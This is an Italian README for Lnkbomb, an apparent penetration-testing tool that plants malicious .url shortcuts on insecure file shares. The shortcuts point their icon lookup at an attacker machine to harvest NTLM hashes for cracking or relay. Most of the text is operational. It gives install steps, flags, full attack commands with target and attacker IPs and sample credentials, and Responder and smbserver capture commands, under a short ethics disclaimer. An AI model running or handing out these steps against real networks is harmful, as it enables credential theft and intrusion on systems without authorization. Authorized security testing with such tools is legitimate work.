
Generatore di collegamenti malevoli per la raccolta di hash NTLM da condivisioni di file non sicure.
Lnkbomb è usato per caricare file di collegamento dannosi su condivisioni di file non sicure. La vulnerabilità esiste perché Windows cerca un file icona da associare al file di collegamento. Questo file icona può essere indirizzato alla macchina del penetration tester su cui è in esecuzione Responder o smbserver per raccogliere hash NTLMv1 o NTLMv2 (a seconda della configurazione della macchina vittima). Il tester può quindi tentare di crackare quegli hash raccolti offline con uno strumento come Hashcat, o relayarli a uno strumento come ntlmrelayx per ulteriore sfruttamento.
Il file payload viene caricato direttamente sul file non sicuro specificato dal tester nella riga di comando. Il tester include anche il proprio indirizzo IP, che viene scritto nel payload.
La versione 2.0 è una ricostruzione totale dello strumento e utilizza la libreria pysmb, permettendo il drop di payload non autenticati e autenticati.
Installazione di Lnkbomb
Nota che il progetto funziona in modo coerente su Windows. Potrebbe avere problemi su Linux.
git clone https://github.com/dievus/lnkbomb.git
Spostati nella directory lnkbomb ed esegui:
python3 lnkbomb.py -h
Questo mostrerà il menu di aiuto, che contiene i seguenti flag:
-h, --help - Elenca le opzioni di aiuto
-t, --target - Specifica l'indirizzo IP del target
-a, --attacker - Specifica l'indirizzo IP della macchina attaccante del tester
-r, --recover - Utilizzato per rimuovere il payload al termine del test (es. -r payloadname.url)
-w, --windows - Nuovo comando - necessario per impostare le porte appropriate per le condivisioni Windows
-l, --linux - Nuovo comando - necessario per impostare le porte appropriate per le condivisioni Linux
-n, --netbios - Nuovo comando - il nome netbios per le macchine Windows target deve essere incluso
Esempi di comandi completi includono:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
Dovrai utilizzare uno strumento come Responder o smbserver per catturare l'hash NTLM.
responder -I eth0 -dwFP -v
o
smbserver.py . . -smb2support
Tieni presente che questo strumento è destinato esclusivamente a scopi di hacking etico e penetration testing. Non approvo alcun comportamento che includa test su target per i quali non hai attualmente l'autorizzazione.
Questo strumento potrebbe funzionare o meno a seconda delle patch e delle versioni del target. L'esperienza utente può variare.
So che sono scorciatoie .url e non estensioni .lnk. Lo faccio per provocarti.